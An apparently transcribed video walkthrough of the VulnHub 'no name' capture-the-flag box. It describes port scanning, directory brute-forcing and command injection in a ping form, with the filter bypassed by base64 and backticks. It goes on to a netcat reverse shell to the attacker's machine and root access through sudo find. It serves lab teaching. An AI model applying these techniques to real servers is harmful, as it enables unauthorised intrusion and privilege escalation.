Hello guys, and welcome back to another video. In this video we're going to be doing another WebCTF challenge. This time we're going to do a box similar to the previous videos I used to do, where we download a box from VulnHub and then attempt to complete the challenge. This time we're going to be doing the no name box on VulnHub. If you want to go check it out, you can go to VulnHub and download the box and try it out yourself. As you can see over here, I'm in my Kali Linux machine, and inside the internal network that I have set up right now, I have this Kali Linux machine and the box that I'm trying to do right now, the challenge I'm trying to do, the box I'm trying to hack into, right? So without further ado, let's get started. All right, so the first thing we want to do is we want to determine the IP address of the vulnerable machine on our internal network, right? So in order to do that, we're going to use nmap. We're going to do a silent scan in order to make it realistic. So basically what the silent scan is going to do is that it's going to scan each port, but it's not going to complete the TCP handshake. If you don't know what a TCP handshake is, you can go look it up online and research that. But basically that's what it does. Then we're going to say -sv, which is going to check service versions. So when we scan the ports, it's going to determine the versions of the services running on the ports. Then we're going to do -p, which basically means scan all 65,535 ports on the machine, because again, the computers have 65,535 ports, and we want to scan all of them so we don't miss any potential open ports that we can try to attack, right? And then we're going to do -o to specify an output file to hold the results of the scan. We're going to call it scan results. That's the name I like going with all the time, because again, it's pretty straightforward. And then we're going to do -t4, which is going to specify how fast we want to do the scan. Again, the nmap tool has an option where you could configure how fast the scan goes. Again, obviously, if you make it really, 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 really fast, it's gonna slow down the. It might crash basically, right? And if you go really, really low, then it's gonna be slow. If you want to know the exact numbers that you can use with nmap, you can simply look at the man page for nmap. But the one I always go for is t4, because t4, again, it's not too fast and it's not too slow, right? So then what we're going to do is we're going to scan all the IP addresses of this internal network that consists of the Kali Linux machine and the vulnerable machine, which in my case is 10.38.1.110 all the way to 10.38.1.110-20. Again, since we're using a silent scan, we need super user privileges to do that. So we're going to prefix this with sudo. And then now it's asking for a password, so let's just type that in. And then we're going to start a scan. And once the scan is complete, we're going to come back. All right, so now that it says that port 80, again, the scan is completed, right? So it basically says that port 80 is open on the machine, and the IP address of the machine is 10.38.1.118. How do I know that? Because again, it identified two machines, one with this IP address and then the other with this IP address. And we know that this IP address is mine, because if I just go ifconfig, we can see that this Kali Linux machine's IP address is 10.38.1.119, right? So this is my machine. And then we know that there's only one other machine on this network. So this IP address has to be the IP address of the vulnerable machine. And over here it says that port 80 is open and has HTTP service running on it. And the version is Apache HTTPD 2.4.29, and it's an Ubuntu machine. All right, so since this is a web server, because it's using HTTP, we can access it using a web browser. So that's what we're going to do next. So let's just open up a web browser, and we're going to access the web server that's running on this machine, or the vulnerable machine, I should say. Right, so 10.38.1.118. And as you can see, the web server, again, it caught our request, and then it sends back this page, this fake admin page over here, this fake admin area page. And it says fake query. So again, it's basically, if you just type something in, and then hit submit, it says fake ping executed. Okay, so it's ping is involved, but it's saying fake pin. So maybe this is not that important, but since it says ping, maybe it's taking whatever we type and it's pinging. But since it says fake over here, this is probably not important. Let's just look at the source code over here. Yeah, so it basically it's a form request, not a form request. What am I talking about? I'm not speaking correctly today. Basically, this is a form, and then what's happening is the data is being sent to index.php, which is again just this file, as you can see by the tab title over here. This is index.php, so just sending it to itself. Basically, it's again. Let me just explain. This is a PHP script, right? So PHP can be combined with HTML. So what we're seeing right now is the HTML portion of this index.php file. The PHP source code, okay, it's on the server. Okay, so what ends up happening is whatever we type here gets sent to the PHP source code that's on the server. Okay, and then that's what sends back this fake ping. Now we don't know how the source code looks like, so we don't really know how the logic works. But I'm assuming because it says fake ping that possibly there's nothing important happening here. So that's this page. Is there a robots.txt? Nope. All right. So now what we're gonna do is we're gonna do a directory brute force. So we're gonna try to check every single. We're gonna try to find other directories that are on this server. Okay, and we can do that using a tool called GoBuster. So I'm gonna say GoBuster. As you can see, I use it very often. We want directory brute force. The URL is 10.38.1.110. No, it's 18. The word list we're going to use is user share. This is the word list I want to use. It's derb and common.txt. I got the name wrong. Give me a second. Let's look in that directory again. Because again, I'm using Kali Linux machine, and it comes with Kali Linux comes with a lot of word lists that we can use for brute forces and stuff like that. So we're gonna say user share derb, and then we're gonna say just looking here, this word list. Okay, so that's the path. Let's try that again. GoBuster der u 10.38.1.118. The word list we use user share derb word list common.txt. And then let's look for, let's just do a regular scan first. And then we're going to do the same thing, except we're going to add specific extensions to look at. So we're going to look for the PHP, TXT, and HTML extensions. And yeah, we don't want to use this word list. I'm going to use this one. We just do that. Again, this is a pretty quick search because again, the common.txt word list that it's using to try here, it's not that long, so it finished quite quickly, and it found this path over here, this admin, and this has a status 200, which means that we are able to retrieve it, right? So let's just access that. I'm just gonna go here. And it's just this page with all these images. It says Haclabs directory of gallery here. Let's just look at the source code. Yeah, so it just gives us these images. Maybe we have to do some things with these images, like download them, look for strings inside of the image files. Maybe look for any hidden files. In here, use some steganography. If you don't know what steganography is basically where it says passphrase harder. That's interesting. Anyway, so basically, steganography is when we try to look at image files and try to find um, any hidden files, any hidden strings that are important to us here, right? So we're not gonna do that right now. I don't think these, they just look like regular images. I don't think these have anything important in them. So let's just continue from what we were doing earlier. Is the other scan oh, it's already finished as well? Yeah, so we found the same thing basically. It's just this admin page. So earlier when I was doing this challenge, this is why, guys, it's very important. If you do a directory brute force and you don't find anything important, because right now we only have this admin page that has some images and nothing else, right? We did 2 scans and we only found admin. It's always good to switch up the word list you're using. So maybe the word list you're using didn't have um, the directory or page that exists on the server, right? So that's what we're gonna do right now. Instead of using word lists, there's a bunch in here. Again, if you're on Kali Linux, you can just look in this directory and see which word lists exist. If you're not, then like maybe use your own or use another way you can access these word lists. But in here we have this thing called big.txt. Okay, so we're gonna use that to do the scan, and we don't want to look for extensions right now. We just want to do a quick scan over, and then if we still don't find anything, then we're gonna use those extensions. So let's just do this. Because again, the issue I used to run into a long time ago is every time I do scans, I use one word list, and then if I don't find anything, I just will just give up on doing it. But the more and more I do this, I learned that it's better to just switch up word lists, because again, the word list has a limited number of words, right? So you might not get the directory or pages that you were looking for. So it's always good to switch them up. Okay, so right now we didn't find anything. Let's just do the specific search for files with these extensions, because our previous scan didn't do it, and see if anything new comes out. Okay, we got the admin back again. Is there anything besides admin? Alright, so this looks like it's gonna be a very long scan, so whenever the scan is completed, we're gonna come back. Alright, so the scan is completed, and it seems like we got a status 200 here, and it's a new file called superadmin.php. So that's the new file that we got. And obviously, as before, we have the admin and the index.php. Index.php was the first page that we got with the fake ping message coming back to us. So we're gonna look at this superadmin.php file. So let's just do that right now. Superadmin.php, and it says enter an IP to ping. Okay, so let's look at the source code here. Yeah, so basically the method it's a post method over here, and the action is basically It's just nothing over here. All right, so we have to. It says type in IP, so let's just do local. And as you can see, it just returns. So if you want to see something interesting here, again, if you're wondering why these suggestions come out, it's because I already did this box, because again, like I said in my previous videos, I like doing the challenges first, trying them out, learning how they work, and then presenting them in a video so you guys can learn better. So as you can see, after writing an IP address over here, we got this output, which basically shows that we ran the ping command on the IP that we typed in. If I open Linux over here and say ping 127.0.0.1, if you notice, the output is it is the same actually, which tells me, okay, that again, let's look back at how the file is working. This is superadmin.php, right? So what we got back when we requested this page is the HTML of the page. Okay, so now that we got the HTML of the page, the PHP component of this file is running on the server. So whatever we type here is being sent to the server. Yeah, just checking. Yeah, that's being sent to the server, and then basically the PHP script in the back is making a ping to the IP that we typed in here. But PHP, in order for PHP to run Linux commands, it has to use certain functions. In Linux, you have an exec execute function that basically runs the commands and then returns an array of the output of that Linux command. And there's another function called shell execute that basically only returns the output. Over here, we don't see an array object. We see just output. So that means that again, we didn't see how the script looks like, but since we know a little bit about PHP, we can assume that shell execute is running on the superadmin.php, the PHP portion of that file on the server, is running the shell execute command to run these Linux commands. Okay, so let's just try and play around with it. So if we know that, what if I typed in, let's say, something like UI? It's gonna try to run ping on this. Obviously, that's not a valid IP, so nothing's gonna happen there. And then use a pipe command, and then say something like pwd to check the working directory. Right. So what happens if I do that? So let's hit submit. So nothing happens. Okay. Let's try. Let's do the same thing, but then let's just say ID. Okay, so it ran now. So this is already bad. Like from a server point of view, this is bad, obviously, right? But again, this is a challenge. So we are able to run commands on the site. Let's check how the because remember we did the same syntax when the first time we did UI pwd, it didn't work, but then when we did UI ID, it worked. So it looks like pwd is being blocked. So let's just look at the superadmin file itself. Okay, let's see how it looks like. Submit. Let's go to the source code. As you can see now, we were able to, so the cat command actually went through, and we were able to see the PHP component of the superadmin.php. So whatever we typed in here, the IP, it was being sent to this script that was running on the server. And then this is how it was determining. This is what it was doing to send this ping command. As you can see, it's using the shell execute function to run the Linux command. So whatever we type, it goes in here. And another thing we see is that first we have this word variable, and it's holding an array with these special characters and some of these commands like pwd, right? And then it takes whatever we typed, which is again this this pinger you see over here, right? Because remember here, whatever we typed in the text box is being sent to the server using this pinger variable, right? Whatever we typed is being sent to the server as pinger, right? When the post request is being made. So it gets that and stores it in pinged. And then what happens is it replaces every instance of these words, okay, with nothing inside of what we sent, right? So if we have any of these words in here, it gets removed, and then it compares them and sees if they're equal to 0. Basically, it means that if these two strings are the same, then we get 0. If they're not, we don't get 0. Okay, and the only way we're gonna get 0 is if this new string basically doesn't contain any of these characters. If what we typed doesn't contain any of these characters, then the new string after doing the replacing is gonna stay the same, right? So this basically is preventing these characters from being used in the ping command over here. So it doesn't actually modify and execute random commands. So one thing we can do here to get around that, one easy thing we can use to get around that is, what if we encoded the command we're sending? So instead of saying something like, let's say UI, instead of saying pwd, because it's going to get rid of that, or doing some command and then saying and then do something else, because that's not going to work either, because it blocks end. We can't end commands by doing this. We can't do any of that. So one quick way we can avoid that is we could encode the command in base64. So how can we do that? We're going to go over here. Let's say we want to do ls. I mean, I'm pretty sure ls is being blocked as well, right? Yeah, see, it's being blocked. So to avoid that, we could go over here and say echo ls and pipe that into base64. Again, if you don't know what pipe does, it just takes the output of the previous command and gives it into the next command as input, right? So echo ls is going to return ls, and it's going to send that to base64, and base64 is going to encode it. So this is the base64 encoding of ls. So if I say echo, I then place this command and then say base64 decode, this is going to decode this back to the command that we wanted, which is just ls. What do you think is going to happen if I press submit? Is it going to execute ls? Because what's going to come back from this? Okay, it's going to be just ls. So is it going to execute ls? No, it just returned ls. That's because it's interpreting all this, okay? It's executing this command. This command's going to return ls, so it just returns ls. If we want this command to execute, which is going to return ls, and then we want to execute what's going to come out of that, we can use the backticks. Because what this is going to do is first it's going to execute this and say, oh, ls, okay? ls is going to come out of that, and when it gets ls, it's going to look at ls and actually execute it as a command itself. So now when I press submit, it actually runs and interprets the ls command as an actual command, right? So let me just explain that again if it was a bit confusing. So if I look at how this is being executed, again, obviously the script is going to go in, it's going to look at this string, is going to try to find the characters that it prohibited and replace them with empty strings, but then none of those are in here. So since none of those are in here, it's going to find that when it compares what we typed and the new string variable, it's going to find that that's 0. So then it's going to go in with the command. It's going to say ping, and then it's going to see this part. This is not a valid IP address, so nothing's going to come out of that. And then we have a pipe command. And then this command over here is going to execute, which is going to return ls. Okay, because it's going to decode this basic C4 string. But then we have these backticks in here. So what's going to happen is it's going to execute the output of this command as a command itself, right? And then when it executes ls, we're going to see what's inside of that directory, which is these files over here. So that's how we're getting things to execute. So now that we know that, let's try to get a reverse connection back to our machine. So I'm going to set up a listener. Let's just open up. Let's just go from here. So I'm saying LNC, LNVP. Let's say 95. So what this basically says is we're using the netcat command, which again is just a Swiss Army knife in Linux that allows us to connect to things and to listen for connections. Then we have the -L option, which means listen. We have N option, which basically means no DNS. We have the V option, which basically means verbose, so and complete. And then we have P, which is the port, and then we specify with 95. So we're gonna hit enter. Now we're listening, and then now we have to create the command to connect to this to the machine. So the command should be you want the server to execute this command. So we want to say nc 10.38.1.119, so we can connect back to us on port 95. Okay. This should work. Give me a second. So if I wanted to connect to port 95, I have a listener set up. Okay. I have the listener set up. Hit enter. So I have this. So we did get a connection, but notice that no command is being executed. Okay, let's just disconnect for a second. Let's change the command. I think we have to specify the shell. Specify the shell we want to use, so that when we connect, we're given this this shell. So let's try this now. Copy. Oh wait, I didn't set up the listener. Let's write it again so we can confirm. Okay, it still didn't work. Yeah. Alright, so I've been trying a couple of commands, and it seems that the one that I found works here is the traditional one, traditional NC, because the regular NC for whatever reason doesn't allow the -E option to connect, to give us a shell when we connect. We can connect, but we can't seem to get a shell. So that's what I'm gonna do right now. I'm gonna use the traditional option. So again, when we use NC traditional, we want to give ourselves the bash shell when we get the reverse shell from the server. So the server is gonna connect to us, and then we want to be able to get a shell, right? So we're gonna use the bash option. And then we're going to specify the IP to connect to, which is our IP, and then the port we're connecting to, which is our port 5000, which is why we have a listener set up. We have the bash, we have the base64 encoded version. We're going to copy that. We're going to run this command. There's the connection. And there we go. We are connected to the machine again. So now that we're connected, the challenge, if you looked up the no name box on VulnHub, the one we're doing it now, it basically said we have to get 3 flags that are in the user directories, right? So user directories are in the home directory in Linux. We know it's Ubuntu, right? So we know that they're going to be in the home directory. So let's just go over to it. We're inside, and before we do that, let's first create a bash shell. One quick way we can do that is say Python 3 -c, which means a one-line Python script. So I'm going to say import pty. We're going to import the pty library. Then I'm going to say pty.spawn, the spawn function. Then we're going to specify the shell we want, which is bin bash, so that it doesn't look like we're writing on we don't have this ugly empty space here. Close the string, hit enter, and there we go. So now we're connected. Oh, we can't clear. Fine, we're in the home directory. Press ls to see what's inside. We have 2 users called Haclabs and another one called Yash. Let's go into Haclabs. Press hit ls. We have flag2 over there. Let's just read it. So flag2.txt. This is I am flag2. Okay, so we have flag2. I'm assuming Yash is gonna have. Let me just zoom in a bit here so y'all can see. Yeah, so we're inside of Yash. We hit ls. We have flag1, flag1.txt. So we have 2 flags now. It says, due to some security issues, I have saved Haclabs password in a hidden file. Okay, so if you don't already know, in order to look at hidden files in Linux, we're going to say ls-a. That allows us to see hidden files. There are a couple of files here. None of these are going to have what we're looking for. That's a directory, fine. One way we can do that is we can say find. Let's start at the top of the file system, which is the root directory. Then we're going to say the type of the file, the type of the thing we're looking for, the file. The owner is the user, basically it's Yash. Okay. I'm not sure if there's an option to check for. I don't think there's an option to check for. How do I say it? To find to specify a hidden file. Maybe there is. I'm not sure, but let's just go with this. All right, so we have this file. We have this file over here called the user in the path the user share hidden, and then dot pass wd. Let's just wait for the command to finish. Okay. So we have this interesting file over here. It's called user share hidden dot pass wd. And as you can see, since it has a dot in front of the name, it means that it's hidden. And it's inside the hidden directory, which tells us that this is most likely the file we're looking for. Let's just cat that out. So I'm gonna say cat user share hidden pass wd, and there we go. So this has to be Haclabs password. Let's switch over to Haclabs' account. Okay, so now we're Haclabs. And we have all three files, so let's just get root at this point. We got every single one of the files. Actually, no, did we? No, we only have two. We only got Haclabs, and we have Yash, so we need one more. Since there's only two users, let's try to see if we can get root. So we're gonna see sudo -l. This is gonna tell us which command we can run as sudo without knowing the password for the root password. And it said that we can run find. We can run the find command without without knowing the root password. So if you look it up, if you go out on this, what's it called? There's this one command you can use that basically allows us to run commands and gain shell, gain the root shell using the find command. And that command is sudo, and then we paste, and then we have this command over here. So if I press enter, we should be the root user. What we can check is say who am I, and then we have where the root. Sorry about that, guys. There's a mild disturbance. So if you can see already, I ran the find command with sudo in the beginning because again we don't need the root password for running the find command as the root user. So I did that, and using this specific command, I found there's a site called GTFO bins that tells us the ways we can use binaries in order to get a shell. So using that site, I found this command called this find command that allows us to get a shell, and if you run it with sudo, it allows us to get a root shell. So we got a root shell. I said who am I? It tells us we're root, and if we look inside of the root directory, if I just do that, root, and press ls, we have flag 3, and once you get flag 3, we are done with the challenge. So I hope you guys enjoyed this challenge. I need to leave soon, so hope you guys enjoyed. If you have any questions, leave a comment. I'm gonna respond to them. Leave a like if you enjoyed the video. Have a good day.